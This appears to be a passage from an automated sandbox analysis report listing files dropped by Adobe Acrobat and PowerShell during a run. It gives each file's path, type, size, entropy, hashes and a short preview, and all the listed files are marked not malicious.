                                                                                          Size (bytes):292
                                                                                          Entropy (8bit):5.307192207217964
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfQ1rPeUkwRe9:YvXKXqrsLKRsdTeOAGY16Ukee9
                                                                                          MD5:E5D601985175111664A7AA49E54AF5C2
                                                                                          SHA1:86F11C6A1AABDF81E112EBD919DFE7C0FA870AA5
                                                                                          SHA-256:053C052D1422E38907B2F608D548A5FD13169C517608086626D7309084972CEF
                                                                                          SHA-512:6F2963416B99E1F2A9EDD21C4D0A301D86FD2CBEC6B42E1B10ACCABB034A8503563F3AE0617705278FBCF931F4A02816D0C2FF677BAF3F19C6C09E64ABD79A1A
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):289
                                                                                          Entropy (8bit):5.320895191709815
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfFldPeUkwRe9:YvXKXqrsLKRsdTeOAGz8Ukee9
                                                                                          MD5:2B5D96EF51667A81811B726A55B9E618
                                                                                          SHA1:B97032E08D64ED8E86E10C71DE0C3B22870E2DAD
                                                                                          SHA-256:7C6FEC91BE1234F78E7B98F0A8FFE9F941526ADBE922F6892B7189A76BA09968
                                                                                          SHA-512:106C0F9A3E917DA97F00567E7D1B0A7D119BB2EE8FF311EF8DE598833967309747FCEC4B489B018C52E033D92FC84424898EB4CC52C6D9AB08E24DD79C44BB52
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):295
                                                                                          Entropy (8bit):5.328355774122141
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfzdPeUkwRe9:YvXKXqrsLKRsdTeOAGb8Ukee9
                                                                                          MD5:A6825B98FDCC55DA71FF8383A9DD1578
                                                                                          SHA1:0476823287FC4327C515CBB4878F73251830580F
                                                                                          SHA-256:02680ABC590AA6656A6506BA22380F84C8A621D54C61F88FD60FEB97E0728F01
                                                                                          SHA-512:1C08907A479C4CCAE08967AD57655A3896F180435F32A4CD0E76B7955A3F70E3647F48F84F16910BD86B4EB956D54F44E6F22A00271D12A07B9488783AEB205D
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):289
                                                                                          Entropy (8bit):5.309186205197633
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfYdPeUkwRe9:YvXKXqrsLKRsdTeOAGg8Ukee9
                                                                                          MD5:3FD34F2086B762526076E889BC07D865
                                                                                          SHA1:3C3B31E85D7C2A6EF6E0DD8343999223B3A751CF
                                                                                          SHA-256:B9CAF21EF7BDBEBAB7D373EB1C574F08183AEA36D3972F471D64BC09325F97C1
                                                                                          SHA-512:DDBCC3DA2A93837A34B7B0C3077A4448141FFB92C28808D36109D5D2FA9C8371371164C46395510755E13291EFEA55C88668E82DC4A3F625FB51E5A6630ABB87
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):284
                                                                                          Entropy (8bit):5.295697297912894
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJf+dPeUkwRe9:YvXKXqrsLKRsdTeOAG28Ukee9
                                                                                          MD5:30D4CBAEC25E06B21537FCCD16BC8111
                                                                                          SHA1:E27AA85B50F67197D32E62FF3A6DC71116A91D06
                                                                                          SHA-256:726AA3DCD13AB4387B9922A6246E296AA440A6DBB3951028486FD905A30D9924
                                                                                          SHA-512:BD1DDC6FB9477D3F2E9CE010CF4405ABAD81B9383CCB01758B918E64E5F94E2A1C9BD42500D856974F8E45912233A000B46C712EF104DDEB0182B7FFEE52E0DA
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):291
                                                                                          Entropy (8bit):5.292670167440584
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfbPtdPeUkwRe9:YvXKXqrsLKRsdTeOAGDV8Ukee9
                                                                                          MD5:B84820B867C9FF2466568AD0F4BEF8DD
                                                                                          SHA1:67CC040C3A81022A6FB8D4EDF31CD4D3BFA8935E
                                                                                          SHA-256:C591D1E6CA3D7095F59F8C99AEBAFE35F33C67E4BB29E17FDD26CBF23FBFED72
                                                                                          SHA-512:D300F7D1C04F3A22A03A063E6D634ABEC201EE81FCE019B792DC5458B157BB94EAEED707D4C9B1FDBD8A9D48D014230C4650ACD72ED8BAC138CDD01C8D445B54
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):287
                                                                                          Entropy (8bit):5.2974487708749525
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJf21rPeUkwRe9:YvXKXqrsLKRsdTeOAG+16Ukee9
                                                                                          MD5:89E2DBB2A7DC2A8B0361DB18123F29DA
                                                                                          SHA1:CA86DFE016412C5C9AD1896FDC68E42737FC88F1
                                                                                          SHA-256:B57E29A5DF42DE3C8A42C8AC41A230E36B546EBB08DED5D722B4279537A549C2
                                                                                          SHA-512:3B93B1D82CD43D771DABADA66903BAE57C43FC5E6E315B9EE6BE029E69DDD9D5E8BAF8E5FF4C67B9FF4CD671764E1BB1474F1EAF5659FF4A17839E2040EA61BE
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):1090
                                                                                          Entropy (8bit):5.6609352846964285
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:Yv6XSs6meOlamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS3:YvtsJe0BgkDMUJUAh8cvM3
                                                                                          MD5:C95FA0FB9D451E1F42DB9EBC9C289A00
                                                                                          SHA1:F566F13C866453BD5B4A4F2076C006C77375AD72
                                                                                          SHA-256:69BA40CF8BC5B302CE3F15061892E8A7453B60A27F052FC2DEFE98466A162D65
                                                                                          SHA-512:8B8DE301E4C82CF36DE2FB2B8CDD94AB9E0051AE33179A49138E9F2DDAF0343C04495DDD22DE5984495370BFEF3C8BCC76E41450DD94C9E6EBEBB6F4C0BC38B6
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):286
                                                                                          Entropy (8bit):5.272277792730928
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfshHHrPeUkwRe9:YvXKXqrsLKRsdTeOAGUUUkee9
                                                                                          MD5:5C7C3B1B1C3BA1C0C99A8CA927789AE8
                                                                                          SHA1:0645A4B591ABFCEFCF09C95E635870738AE46BDE
                                                                                          SHA-256:D54FBE647BD481285B64D0B8220E9EE07DB31E56AC97EC3FE36CD806B8DDDE51
                                                                                          SHA-512:646D7186BA0C4BF845FA89D0287FD9417CB1F444DB1AB3EF4529FE729B6E612E7C1078BD72C42E76D149F582ED25186A226BD8CD62CF97F56F1E65447080EC79
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):282
                                                                                          Entropy (8bit):5.287184362302357
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJTqgFCrPeUkwRe9:YvXKXqrsLKRsdTeOAGTq16Ukee9
                                                                                          MD5:F290521E2F6E6E87C42C98740B5054A6
                                                                                          SHA1:505D03FFB71E21A84F3BEB4E4CACF5F23D8CF2C0
                                                                                          SHA-256:4E4DE1743DE2CC88331E6C20498D46406F91EC696156AAC787B7F4CFB3F43B08
                                                                                          SHA-512:D52E248BEDEDEE8393E538BC1B5C82CBF0082CE2EE285FE50E1982C192DFDF277C612C0E0F84298FD7532E1F401E63C0AF3489D4A11F542EFF0B7B22C3D4BF07
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):0.8112781244591328
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:e:e
                                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                          Malicious:false
                                                                                          Preview:....

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):2814
                                                                                          Entropy (8bit):5.13807488982936
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:Yw/ICEDCNCYCxfzZCXCdCDcCD7bCV0CaNVCZm+CBKXCsOr9/xT:T/ICEDCNCYCxbZCXCdCDcCD7bCV0C2Cc
                                                                                          MD5:5E70B3B9DCFA435281C1058FF9517F2A
                                                                                          SHA1:1C0BC3E596C0AF891B112157A29E54BE781A1A9D
                                                                                          SHA-256:9D3830499E205B4DE3E401F04B026C04C0B124CE6E3DCC94955F185BD723BBB0
                                                                                          SHA-512:6471848F4E1EA267C88FAD91B645EACA584E638DE22D304C733D6F0918CB7C95646F6C543D56096F76F1F37BB2827ED9EDEBD8EC6F99454D7739A8A202E5A258
                                                                                          Malicious:false
                                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"215b19a53404e0aef52a873c04e6f5d3","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734613723000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f6e63fcb215afe2b173215247186bace","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734613723000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"fba2eecd561b2c6a1cdc413cdadc1468","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734613723000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"4866a966d6e4ae69b6edae55f2509de1","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734613723000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"f7dd334f2eb735f0d6433c97a1a09696","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734613723000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"d615731e757b063891110491811983ab","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                          Category:dropped
                                                                                          Size (bytes):12288
                                                                                          Entropy (8bit):1.4514612073139428
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2ds1UlWO:lNVmsw3SHtbDbPe0K3+fDZdc7O
                                                                                          MD5:2069B359FFA31EB3F319695BB14C29C6
                                                                                          SHA1:91D753E0344D2E6B6874A7163327ADF825D26FC5
                                                                                          SHA-256:3352D6199DF0C2A33E01B29425B9B1888CFC1D52D7D8C2927017BFE553D7550D
                                                                                          SHA-512:A0E11B817EFA76A36AD38E21A962C285F8FD9170B71FC3E69D887D07EB7F141F2CC2091564613BEE2B147EF954B8A849AEAEE0A0245E5D28489F8692928CE51E
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite Rollback Journal
                                                                                          Category:dropped
                                                                                          Size (bytes):8720
                                                                                          Entropy (8bit):1.955484376620564
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:7MGrvrBd6dHtbGIbPe0K3+fDy2ds1xNqFl2GL7msk:7L3SHtbDbPe0K3+fDZdcrKVmsk
                                                                                          MD5:80587A4FFCE53BE2E949614E212DD60E
                                                                                          SHA1:6211D690A5D9A6DB853DB4A1253A2C83263A6686
                                                                                          SHA-256:3AD38F7EE3F070C4756CF8B59B4828C2F0CCDD2CAF9A1057975765CD83ADD034
                                                                                          SHA-512:20391627AC60D808599811381AE9D4628A80A6FDC2A6978AC0728AF36475F7595BA0A2B34F6610970AF976456660298DB9678CC33E69DBB570891AE7AD4C9997
                                                                                          Malicious:false
                                                                                          Preview:.... .c......M|.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):66726
                                                                                          Entropy (8bit):5.392739213842091
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgFL4ol5ATDHj/VrOey5IEdPtYyu:6a6TZ44ADEFL4ozATDj8NtK
                                                                                          MD5:EB2E983EFD65B9769F10F5F8DD5964B4
                                                                                          SHA1:6A9E3E5465383B6B64F88CD7A40BC54B2DFE2452
                                                                                          SHA-256:5763B35F48D18BEEA8D3CD63A6532F4443B75FF4F021B8F59EE26B196919B90B
                                                                                          SHA-512:ACD7837BD871294EA7361F0FB3FA65511CED3FD3B9CE7F2B314F2ED1FA73714C7A33514B9786F45E364FD0AED12200DDD779456A4A2E76ECB160E9032B905A28
                                                                                          Malicious:false
                                                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlllulzych:NllUec
                                                                                          MD5:599AEF4CF899A068F1C52942AC2767D6
                                                                                          SHA1:0551ACAAAAD90D63B311551C3436A627D88F1A23
                                                                                          SHA-256:B1DB9D56B886B8A53FBCED14386BB9A9258DD0008EADA73181C655A9D4A33E30
                                                                                          SHA-512:BAFAE235810B95669C88DB19FF84A9549CB8FD66663E1DFA48B0BE15DD3F8DC177ECF970E41E0AFE82E2773EF0F2826629F47E444891A95ADF1A2400494F9B1B
                                                                                          Malicious:false
                                                                                          Preview:@...e...................................y............@..........

                                                                                          C:\Users\user\AppData\Local\Temp\MSIb933a.LOG

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):246
                                                                                          Entropy (8bit):3.5502705600366484
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlA2u:Qw946cPbiOxDlbYnuRK+u
                                                                                          MD5:1A37AF1C00713F2C0890DDD383B02B1F
                                                                                          SHA1:6C3A63A29F0B1A177832A2D58596C209197473CB
                                                                                          SHA-256:B7E1FC2B3B5452312AE0A56510F0FD33090C9799BC1F3F3268EB7A3CE8B8EDEB
                                                                                          SHA-512:A39E7B81FF4499B717176040D334CD477FAEDD631CFCAF95FC448931FA70853DF8527DEA271D83A478D15639194509179108309B13102F18488F2CC644A2A0A8
                                                                                          Malicious:false
                                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.4.8.:.3.5. .=.=.=.....

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3w4o4frv.oxg.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5pkgnwfv.iqx.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vhwky43.zfr.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dl3f4abx.z04.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ekcqn2ds.xh3.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
